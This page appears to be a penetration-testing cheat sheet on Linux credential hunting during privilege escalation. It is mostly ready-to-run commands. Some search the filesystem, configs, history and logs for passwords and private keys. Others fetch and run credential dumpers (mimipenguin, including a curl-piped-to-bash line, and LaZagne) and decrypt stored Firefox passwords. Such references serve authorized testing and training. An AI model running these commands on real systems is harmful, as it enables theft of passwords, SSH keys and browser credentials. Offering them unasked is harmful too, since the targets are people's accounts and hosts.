💥Cyb3rBook

LINUX CREDENTIAL HUNTING

3 min read

PRIMARY CATEGORY → CREDENTIAL HUNTING   •   LINUX PRIVESC

Theory

Credentials Resources
FILESHISTORYMEMORYKEY-RINGS
ConfigsLogsCacheBrowser Stored Creds
DatabasesCommand-Line HistoryIn-Memory Processing
Notes
Scripts
Source Code
Cronjobs
SSH Keys

Configuration Files

.conf    •    .config    •    .cnf    

Find
Search all Configuration Files on the System (Above File Extensions)
for _file in ".conf" ".config" ".cnf"
do
	printf "\nFile Extension:\n\n" "$_file"
	find / -iname "*${_file}" 2> /dev/null | grep -viP -- 'lib|fonts|share|core'
 
done
Search for the specified Words in all the System Configuration Files
for _file in ".conf" ".config" ".cnf"
do
	printf "\nFile Extension:\n\n" "$_file"
	find / -iname "*${_file}" -exec grep -iP --color -- 'user|password|pass' {} + 2> /dev/null | grep -viP -- 'lib|fonts|share|core'
 
done

Databases

.sql    •    .db    •    .bd

Find
Search all Database Files on the System (Above File Extensions)
for _file in ".sql" ".db" ".bd"
do
	printf "\nFile Extension:\n\n" "$_file"
	find / -iname "*${_file}" 2> /dev/null | grep -viP -- 'lib|fonts|share|core'
 
done

Notes

Find
find /home/* -type f -iname "*.txt" -o ! -iname "*.*"

Scripts

.py    •    .pyc    •    .pl    •    .go    •    .jar    •   &nbsp.c    •    .sh

Find
for _file in ".py" ".pyc" ".pl" ".go" ".jar" ".c" ".sh"
do
	printf "\nFile Extension:\n\n" "$_file"
	find / -iname "*${_file}" 2> /dev/null | grep -viP -- 'lib|fonts|share|core'
 
done

CronJobs

cat /etc/crontab
ls -la /etc/cron.*/

SSH Keys

SSH Private Keys
grep -RiP --color -- "PRIVATE KEY" / 2>/dev/null | grep ":1"
SSH Public Keys
grep -RiP --color -- "ssh-rsa" / 2>/dev/null | grep ":1"

History

Bash History
less /home/*/.bash*

Logs

for i in $(ls /var/log/* 2>/dev/null)
do
	GREP=$(grep "accepted\|session opened\|session closed\|failure\|failed\|ssh\|password changed\|new user\|delete user\|sudo\|COMMAND\=\|logs" $i 2>/dev/null)
	if [[ $GREP ]] ; then
		echo -e "\n#### Log file: " $i
		grep "accepted\|session opened\|session closed\|failure\|failed\|ssh\|password changed\|new user\|delete user\|sudo\|COMMAND\=\|logs" $i 2>/dev/null
	fi
done

Memory and Cache

Mimipenguin

Mimipenguin

Python Script
curl --silent --location --request GET "https://github.com/huntergregal/mimipenguin/raw/refs/heads/master/mimipenguin.py" --output mimipenguin.py
python3 !$
Bash Script
bash - < <( curl --silent --location --request GET "https://github.com/huntergregal/mimipenguin/raw/refs/heads/master/mimipenguin.sh" )
Lazagne

Lazagne

Setup
git clone https://github.com/AlessandroZ/LaZagne Lazagne
python3 -m venv .venv
. !$/bin/activate && pip3 install -r ./Lazagne/requirements.txt
Usage
python3 ./Lazagne/Linux/laZagne.py all

Browsers

Firefox

Stored Credentials

Search for logins.json files
find /home/*/.mozilla/firefox -type d -iname '*default*'
Firefox Decrypt

Firefox Decrypt

curl --silent --location --request GET --remote-name "https://github.com/unode/firefox_decrypt/raw/refs/heads/main/firefox_decrypt.py"
python3 firefox_decrypt.py
Firepwd

Firepwd

git clone https://github.com/lclevy/firepwd Firepwd
python3 -m venv .venv
. !$/bin/activate && pip3 install -r ./Firepwd/requirements.txt
python3 ./Firepwd/firepwd.py # Or
python3 ./Firepwd/firepwd.py --dir=<DIRECTORY_PROFILE>
Lazagne

Lazagne

  • Setup ⚙️
git clone https://github.com/AlessandroZ/LaZagne Lazagne
python3 -m venv .venv
. !$/bin/activate && pip3 install -r ./Lazagne/requirements.txt
  • Usage ⚒️
python3 ./Lazagne/Linux/laZagne.py browsers

Graph View

Backlinks